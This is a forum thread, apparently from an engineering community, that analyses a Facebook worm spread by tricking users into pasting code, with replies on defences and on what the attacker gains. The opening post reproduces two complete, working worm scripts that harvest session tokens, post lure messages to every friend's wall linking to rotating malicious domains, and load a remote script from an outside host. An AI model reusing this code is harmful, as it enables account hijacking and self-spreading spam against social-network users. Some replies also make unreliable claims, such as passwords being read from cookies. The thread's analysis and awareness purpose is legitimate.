[CHALLENGE] Facebook javascript worm decoding.

The two scripts that post the videos are chosen at random. Intelligent ruse so the generated wall message is at random. However, one pitfall is that this guy did not put a limit on the number of friends it posts to. I saw this friend's home page. Almost all her friends got it.

Chosen at random Script #1

var message = ""; /* generated */
var caption = "www.youtube.com";
var description = "";
var name = "Youtube Video";
var img = "https://i.imgur.com/NlMK1.png";
//var gw = "https://gateway.wfnetwork.com/widget/contentBlocker.js.php?i=1013"; /* jc */
var gw = "https://www.creepsweepers.info/locked.js";

var url = "https://banfish.info/boom.swf";
var flashvars = "bgimg=i.imgur.com/o0LtR.png&bgimg2=i.imgur.com/lEANf.png&img=i.imgur.com/NlMK1.png&instructX=60&instructY=100&retarded=true&name=&description=&caption=&message=&length=2%3A52&action_name=&payload_url=&buttonText=Play&gwid=1013"; /* don't need these anymore */
var length = "2:34";


/* message spinner */
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];


/* domain spinner */
var domains = ['banfish.info', 'craneland.info','fliptrip.info'];


/* utilities */
function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr){
	return arr[getRandomInt(0, arr.length-1)];
}
function addCommas(nStr)
{
	nStr += '';
	x = nStr.split('.');
	x1 = x[0];
	x2 = x.length > 1 ? '.' + x[1] : '';
	var rgx = /(\d+)(\d{3})/;
	while (rgx.test(x1)) {
		x1 = x1.replace(rgx, '$1' + ',' + '$2');
	}
	return x1 + x2;
}
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];

var domain = randomValue(domains);
url = "https://" + domain + "/boom.swf?" + flashvars;




var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();

gf = new XMLHttpRequest(); 
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); 
gf.send(); 
if(gf.readyState!=4){ }else{ 
	data = eval('(' + gf.responseText.substr(9) + ')'); 
	if(data.error){ }else{ 
		friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
	}
}



var did = false;
function done(){
	if(!did){
	did = true;
  
	var script = document.createElement("script");
	script.src = gw;
	document.body.appendChild(script);
}
}

 done();

function attach(name,val){
	return "&feed_info[template_data][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_media(name,val){
	return "&feed_info[template_data][media][0][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_prop(name,val){
	return "&feed_info[template_data][properties][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
var x = 0;


friends.sort(function() {return 0.5 - Math.random()});
var max = friends.length;
/*if(max >= 50) max = 50; */
for(var i=0; i<max; i++){
	
	message = [randomValue(p1), friends[i].text.substr(0,friends[i].text.indexOf(' ')).toLowerCase(), randomValue(p2), randomValue(p3)].join(' ');
	var httpwp = new XMLHttpRequest();
	var viewCount = getRandomInt(843, 7434);
	var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
	var paramswp = "&__d=1&app_id=6628568379&extern=0" +
				   "&post_form_id=" + post_form_id + 
				   "&fb_dtsg=" + fb_dtsg + 
				   /*"&feed_info[action_links][0][href]=" + encodeURIComponent(payload_url) + 
				   "&feed_info[action_links][0][text]=" + encodeURIComponent(action_name) + */
				   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + 
				   "&user_message=" + encodeURIComponent(message) +
				   attach("caption", caption) + 
				   attach("description", description) + 
				   attach("name", name) +
				   attach_prop("Views", addCommas(viewCount)) + 
				   attach_prop("Likes", addCommas(getRandomInt(432, viewCount))) +
				   attach_media("type", "flash") + 
				   attach_media("swfsrc", url) + 
				   attach_media("imgsrc", img) +
				   attach_media("flashvars", flashvars);
	if(length) paramswp += attach_prop("Length", length);
	httpwp.open("POST", urlwp, true);
	httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	httpwp.setRequestHeader("Content-length", paramswp.length);
	httpwp.setRequestHeader("Connection", "keep-alive");
	httpwp.onreadystatechange = function(){
		if (httpwp.readyState == 4){
			x++;
			if(x >= friends.length -1){
				done();
			}
		}
	};
	httpwp.send(paramswp);
}

Chosen at Random Script #2:

var message = ""; /* generated */
var caption = "www.youtube.com";
var description = "";
var name = "Youtube Video";
var img = "https://i.imgur.com/NlMK1.png";
var gw = "https://gateway.wfnetwork.com/widget/contentBlocker.js.php?i=1013"; /* jc */
//var gw = "https://www.creepsweepers.info/locked.js"; /* jc */

var url = "https://banfish.info/boom.swf";
var flashvars = "bgimg=i.imgur.com/o0LtR.png&bgimg2=i.imgur.com/lEANf.png&img=i.imgur.com/NlMK1.png&instructX=60&instructY=100&retarded=true&name=&description=&caption=&message=&length=2%3A52&action_name=&payload_url=&buttonText=Play&gwid=1013"; /* don't need these anymore */
var length = "2:34";


/* message spinner */
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];


/* domain spinner */
var domains = ['banfish.info', 'craneland.info','fliptrip.info'];


/* utilities */
function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr){
	return arr[getRandomInt(0, arr.length-1)];
}
function addCommas(nStr)
{
	nStr += '';
	x = nStr.split('.');
	x1 = x[0];
	x2 = x.length > 1 ? '.' + x[1] : '';
	var rgx = /(\d+)(\d{3})/;
	while (rgx.test(x1)) {
		x1 = x1.replace(rgx, '$1' + ',' + '$2');
	}
	return x1 + x2;
}
var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!'];
var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself'];
var p3 = ['in this video', 'in this vid'];

var domain = randomValue(domains);
url = "https://" + domain + "/boom.swf?" + flashvars;




var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();

gf = new XMLHttpRequest(); 
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); 
gf.send(); 
if(gf.readyState!=4){ }else{ 
	data = eval('(' + gf.responseText.substr(9) + ')'); 
	if(data.error){ }else{ 
		friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
	}
}



var did = false;
function done(){
	if(!did){
	did = true;
  
	var script = document.createElement("script");
	script.src = gw;
	document.body.appendChild(script);
}
}

 done();

function attach(name,val){
	return "&feed_info[template_data][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_media(name,val){
	return "&feed_info[template_data][media][0][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
function attach_prop(name,val){
	return "&feed_info[template_data][properties][" + encodeURIComponent(name) + "]=" + encodeURIComponent(val);
}
var x = 0;


friends.sort(function() {return 0.5 - Math.random()});
var max = friends.length;
/*if(max >= 50) max = 50; */
for(var i=0; i<max; i++){
	
	message = [randomValue(p1), friends[i].text.substr(0,friends[i].text.indexOf(' ')).toLowerCase(), randomValue(p2), randomValue(p3)].join(' ');
	var httpwp = new XMLHttpRequest();
	var viewCount = getRandomInt(843, 7434);
	var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
	var paramswp = "&__d=1&app_id=6628568379&extern=0" +
				   "&post_form_id=" + post_form_id + 
				   "&fb_dtsg=" + fb_dtsg + 
				   /*"&feed_info[action_links][0][href]=" + encodeURIComponent(payload_url) + 
				   "&feed_info[action_links][0][text]=" + encodeURIComponent(action_name) + */
				   "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + 
				   "&user_message=" + encodeURIComponent(message) +
				   attach("caption", caption) + 
				   attach("description", description) + 
				   attach("name", name) +
				   attach_prop("Views", addCommas(viewCount)) + 
				   attach_prop("Likes", addCommas(getRandomInt(432, viewCount))) +
				   attach_media("type", "flash") + 
				   attach_media("swfsrc", url) + 
				   attach_media("imgsrc", img) +
				   attach_media("flashvars", flashvars);
	if(length) paramswp += attach_prop("Length", length);
	httpwp.open("POST", urlwp, true);
	httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	httpwp.setRequestHeader("Content-length", paramswp.length);
	httpwp.setRequestHeader("Connection", "keep-alive");
	httpwp.onreadystatechange = function(){
		if (httpwp.readyState == 4){
			x++;
			if(x >= friends.length -1){
				done();
			}
		}
	};
	httpwp.send(paramswp);
}

@xheavenlyx: Thanks for sharing this. I was affected by this too.

var p1 = ['hey', 'HEY', 'WTF', 'OMG', 'ROTFL', 'YO', 'yo', 'YO!', 'omg!', 'omg', 'wtf', 'wtf!!', 'WTF!!','OMG!!']; var p2 = ['why are you', 'what are you doing', 'I can\'t believe you\'re', 'you look so stupid', 'i cant believe youre tagged', 'why are you tagged','you should untag yourself']; var p3 = ['in this video', 'in this vid'];

Intelligent use of keywords to tempt people into clicking this spam.

Any effecient way to stop the posts once someone is unknowingly trapped in this spam??

How about changing gmail settings? I did it. It is very effective. 😀

i was affected by that too!!! 😡 😡 😡

clever use of words like ROTFL, hey!- sufficient to lure people into the trap 😡

ishutopre

How about changing gmail settings? I did it. It is very effective. 😀

what we need to change in gmail settings?

Yup, but just talking in general. How does it affect after people get lured? I mean what will the spammer get out of this?

I understand that our reputation between friends definitely may go down. But what are the gains of spammer? 😐

Rajat Shah

what we need to change in gmail settings?

Click on the "settings" on right top corner near the sign out button.

Then click on Filter. Then create a filter for the mails which you want to block.

For example: Block a mail containing the words "XXXXX" 😀

tnx 4 share but...what the impact of this....i didn't understand..

Report from friend: According to new data released in the company’s annual Security Intelligence Report, infection rates for Windows 7 are five times lower than a fully patched machine running Windows XP SP3. Windows Vista faired significantly better, however infection rates were still almost double that of a comparable Windows 7 based PC.

ishutopre

Yup, but just talking in general. How does it affect after people get lured? I mean what will the spammer get out of this?

I understand that our reputation between friends definitely may go down. But what are the gains of spammer? 😐

They dont care for any reputation and such issues. These links are used to carry out XSS attacks also called cross site scripting attacks. The modus operandi is to hide malicious scripts in the link or redirect to another infected domain. Now consider an average net user browsing several pages through multiple tabs - on one tab his yahoo mail id is open, on another gmail account is open, on another facebook account is open and so on. When the person clicks on the malicious link (without knowing it of course), the script gets activated and it steals all the information from the cookies. Thus you lose the user name and passwords of all the accounts open in each and every tab! This happens without the user even getting a hint of it. Along with just that, other details such as credit card info, address, other details too may be grabbed. These information get sold in some IRC hacker channels for about 2-5 $ each. It makes a good amount of pocket money for those geeks to maintain their tech hungry appetite. Believe me or not, this is what is happening and a lot of people are making good amount of money at our expense. It first started with bogus surveys promising to give u things in return for completing them. For eg, one was promised several hundred 'reward points' in the famous facebook game Mafia Wars for completing the surveys. Soon, when awareness about such fake schemes spread up, these XSS attacks have started. I am amazed to see even mature and seeming 'techy' people getting caught into this scam.

What is the solution for this?
There is no complete solution for this other than using ones common sense. Do understand NOT TO CLICK on any links in facebook or otherwise claiming to give u stuffs for free or do seemingly wonderful things for you like showing how you may look 20 years down the line!

There are a few things one could do that would keep them safer from such things.
You may follow the inbuilt facebook settings mentioned by praveen a couple of post above. Though let me tell you that is not fool proof and is quite non practical too.
Since most games/apps are on http, everytime u want to try a new app or game it will ask u to switch over to http and if you click that you are again back to where you were. This helps in no way in differentiating against legitimate links and other wise. Also it would be irritating to click on all the time. Imagine having to click on them everytime you visit a farmville or mafia wars link!

The notifications are even more pathetic.
Email notification sends you an email if an unauthorized computer is trying to access your account. This means you need to have access to your mail box at all times. A good idea would be to link your mail box to your mobile no. But most people do not use this feature and getting loads of mails on ur already crammed mobile inbox may not be a good idea after all.

The sms notification sends you a sms on ur registered phone if unauthorized computer is trying to access your account. I used to use this method earlier but have disallowed it since. The sms doesnt always come on time and may take several minutes. I have faced difficulties when trying to access my account for some important work from my friend's computer and was stuck there waiting for the sms to arrive 😔 So I would not endorse this one too.

Though one may still try if you are ok with those things I've mentioned above.

The better option according to me is:
1] Use your common sense and do not click on such links.
2] Use Firefox and add these addons to ur browser
WOT(web of trust), NoScript, AdBlock plus and Better Privacy.
The best of these is NScript and AdBlock. Especially keep NoScript on for global sites when accessing/surfing new pages. If there is a script hidden in the links or even the webpages, it will show u a warning and will warn u. Incase of known webpages, keep adding exceptions.
To me, this looks by far the best type of protection against most script based attacks.
3] Clearing cookies and other junk helps a lot in protecting the computer and yourself as well. Use CCleaner or similar free software to keep your computer clean.

No offence to anyone and kindly let me know if I have gone wrong anywhere.

P.S. And yes, incase you have already clicked on such links, kindly change passwords of all the accounts you use regularly and if possible change the account info(such as secret/hint questions) for important accounts such as your email accs.
And excuse me if I have made mistakes in grammar or punctuations. It's too long for me to read it again 😛

In the Verify.js the code is

function include(filename, cb)
{
	var head = document.getElementsByTagName('head')[0];
	
	script = document.createElement('script');
	script.src = filename;
	script.type = 'text/javascript';
	script.onload = cb;
	head.appendChild(script)
}


include("https://widgets.amung.us/small.js", function(){
	WAU_small('dkz2a5lyiuwb');
	
});

Its linking to another script which has:

var Tynt=Tynt||[];function WAU_small(b){var a="";if(document.title){a=encodeURIComponent(document.title.substr(0,80).replace(/(\?=)|(\/)/g,""))}var c=document.getElementsByTagName("script")[0];(function(){var e=encodeURIComponent(document.referrer);var d=document.createElement("script");d.async="async";d.type="text/javascript";d.src="https://whos.amung.us/pingjs/?k="+b+"&t="+a+"&c=s&y="+e+"&r="+Math.ceil(Math.random()*999999);c.parentNode.insertBefore(d,c)})();if(document.location.protocol=="http:"){Tynt.push("w!"+b);(function(){var d=document.createElement("script");d.async="async";d.type="text/javascript";d.src="https://cdn.tynt.com/tc.js";c.parentNode.insertBefore(d,c)})()}}function WAU_r_s(c,key){var raw_im_data="data:image/gif;base64,R0lGODlhUAAXAMQAAM1iTdBuWMQ4MsdHOt+ch/js5+/Qw+vCs/Pe1dR6Y+OolNuQespVQ9eFbsAnLX9/fzAwL////zU1NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABQABcAAAX/ICSOZGmeaKqu7Bi9L3IcBWzfeK7vfI+LMAPAQXQEEBGJcslsOp/QqFQaAUYMAiIjMnAIDMmpeEweVyGRQtcxIByy7Fd5Ti+fIwTiABYoKsJ1gYJMd30OeIhDRoCDjXR3igAEEQAChgCMjppihUULL3CLm6OcQHlEEQ0JEX6ZpK9Ld2qofZRxrrCvd1dZrA4AlWC5w7FWEQgJRQ4JSMTOuzAFMzU+1dbX1i3a29zdJhIwSkk24OGAOOU56eJyYw8S73ax7bGE54y45fP1YvFzYXIy4btH6Mm4feKYPIi3kCE8eAuXRHRy8OA6duzQkUuYMSMghyAfhnzYpF1FKPjsNPEDyI8jyXchYSqB2ZBiPYs2W+rjyNIlOIkzX4oU6s9gwB4lN4ZzaW5pmIkxhUIs6uzRsBAAOw==";var raw_im_meta="({'0':[0,-15,5,8], '1':[-5,-15,3,8], '2':[-8,-15,5,8], '3':[-13,-15,5,8], '4':[-18,-15,5,8], '5':[-23,-15,5,8], '6':[-28,-15,5,8],'7':[-33,-15,5,8], '8':[-38,-15,5,8], '9':[-43,-15,5,8], ',':[-48,-15,2,8], 'o':[-50,-15,24,8]})";var meta=eval(raw_im_meta);if(WAU_legacy_b()){raw_im_data="https://widgets.amung.us/widtemplates/smalloutline.gif"}c+="o";c=c.split("");var img=document.createElement("img");img.onload=function(){var wid=document.createElement("div");wid.style.position="relative";wid.style.display="inline-block";wid.style.backgroundImage="url("+raw_im_data+")";wid.style.width="80px";wid.style.height="15px";wid.style.padding="0";wid.style.overflow="hidden";wid.style.cursor="pointer";wid.title="Click to see stats for this site by whos.amung.us ("+key+")";var x_pos=20;if(c.length>6&&c[0]!="1"){x_pos=16}else{if(c.length>6&&c[0]=="1"){x_pos=17}}for(var i=0;i<c.length;i++){var char_meta=meta[c[i]];var character=document.createElement("div");character.style.backgroundImage="url("+raw_im_data+")";character.style.backgroundRepeat="no-repeat";character.style.backgroundAttachment="scroll";character.style.backgroundPosition=char_meta[0]+"px "+char_meta[1]+"px";character.style.position="absolute";character.style.width=char_meta[2]+"px";character.style.height=char_meta[3]+"px";character.style.top="4px";character.style.left=x_pos+"px";character.style.lineHeight=char_meta[3]+"px";character.style.overflow="hidden";character.style.padding="0";wid.appendChild(character);x_pos+=char_meta[2]+1}wid.onclick=function(){window.location="https://whos.amung.us/stats/"+key+"/"};WAU_insert(wid,"amung.us/small.js")};img.src=raw_im_data}function WAU_insert(c,d){var a=document.getElementsByTagName("script");for(var b=0;b<a.length;b++){if(a[b].src.indexOf(d)>0){a[b].parentNode.insertBefore(c,a[b].nextSibling)}}}function WAU_legacy_b(){if(navigator.appVersion.indexOf("MSIE")!=-1&&parseFloat(navigator.appVersion.split("MSIE")[1])<8){return true}return false};

2] Use Firefox and add these addons to ur browser
WOT(web of trust), NoScript, AdBlock plus and Better Privacy.
The best of these is NScript and AdBlock. Especially keep NoScript on for global sites when accessing/surfing new pages. If there is a script hidden in the links or even the webpages, it will show u a warning and will warn u. Incase of known webpages, keep adding exceptions.
To me, this looks by far the best type of protection against most script based attacks.
3] Clearing cookies and other junk helps a lot in protecting the computer and yourself as well. Use CCleaner or similar free software to keep your computer clean.

Kudos to optimystix for that post!

In your leisure time, could you start a couple of threads on CE for tutorials of installing the above mentioned add-ons. (especially for non-IT/CS engineers) as well as how to clear cookies and stuff? I am sure they will come handy to lots of engineers who are unaware.

Excellent recommendations @opti. But there needs to be a correction. I don't think it's possible to get passwords in the way you described from cookies. Someone correct me if I'm wrong or refer to some resources which prove it is possible to get passwords from cookies.

One of the worst ways of screwing ourselves is if we unknowingly download a key logger or another virus which sits on our PC undetected and sends all the vital data.

Here Optimystix advice should be heeded!

1] Use your common sense and do not click on such links.

2] Use Firefox and add these addons to ur browser
WOT(web of trust), NoScript, AdBlock plus and Better Privacy.
The best of these is NScript and AdBlock. Especially keep NoScript on for global sites when accessing/surfing new pages. If there is a script hidden in the links or even the webpages, it will show u a warning and will warn u. Incase of known webpages, keep adding exceptions.
To me, this looks by far the best type of protection against most script based attacks. (NOTE: Yes, These two are enough, including Firefox.)

3] Clearing cookies and other junk helps a lot in protecting the computer and yourself as well. Use CCleaner or similar free software to keep your computer clean.

@praveenscience Yes it contains another script. You know, I have a feeling it is used for authenticating the attack and makes it look like it came from the particular user. This one seems to be the most important script. I am going to clean it up, with indents and carriage returns and post it here so we can have a clearer look at it.

Am working on Antidote of it... I mean, as a browser plugin and a greasy monkey script which makes sure that it doesn't allow the XSS attacks... 😀

Yea, praveenscience but people who are able to install and use Greasemonkey are "aware" enough to not click on these links. I think a better solution would be find the security hole in facebook that makes them able to do this and inform them about it! We are Crazyengineers.com they out to listen to us.


Anyway, one minor scary thing is that it sends all the click data (for further analysis by the exploiters?)

if(document.location.protocol=="http:"){
		Tynt.push("w!"+b);
		(function(){
			var d=document.createElement("script");
			d.async="async";
			d.type="text/javascript";
			d.src="https://cdn.tynt.com/tc.js";
			c.parentNode.insertBefore(d,c)
		})()
	}

There are many such screwed up craps found here, which are deadly than those with the phishing attacks. Some scripts get the cross domain cookie information, like what the web developer does for you! 😲 They can easily hack things up if the user has a session running with all the mails and logged in them! 😔

Sorry for digging this up, but I wonder whether anyone has got a solution to get rid of these javascript Worms? :/ All these ways to prevent them are great and props for the work but they are useless if you're already infected.

I feel so ashamed lol, all these years I've been telling people to be cautious on the internet and now I fell for one of these scams myself. 😔 I didn't even realize I had been infected until a friend of mine told me that he had received a strange entry by me on his FB Wall, and a few minutes later another Pal informed me that he had been invited to some strange Event by me. Even though the worm you're talking about here didn't send these strange event-invitations, it appears to be the same one that Ive been infected with since in order to get it, I did the exactly same thing described in the first post (clicked on a video, ctrl+v'ed the code and hit enter). I don't know what I was thinking in that moment, probably "oh its just some code I'm copying into my URL bar, can't do much harm right?). And now I'm reading about all those horror messages here, that this shit is exploiting my whole PC and all my Account Data 😨 I'm really scared right now.

Btw it only sent event-invitations and FB Entries to some of the people in my friendslist, I deleted the events aswell as the entries on my friends FB Walls, but I'm still scared that the worm might send more entries some other time. Is it over already? I'm a little confused since it didnt send these entries to all my friends but just a few of them.

Thanks in advance for any useful answers 😀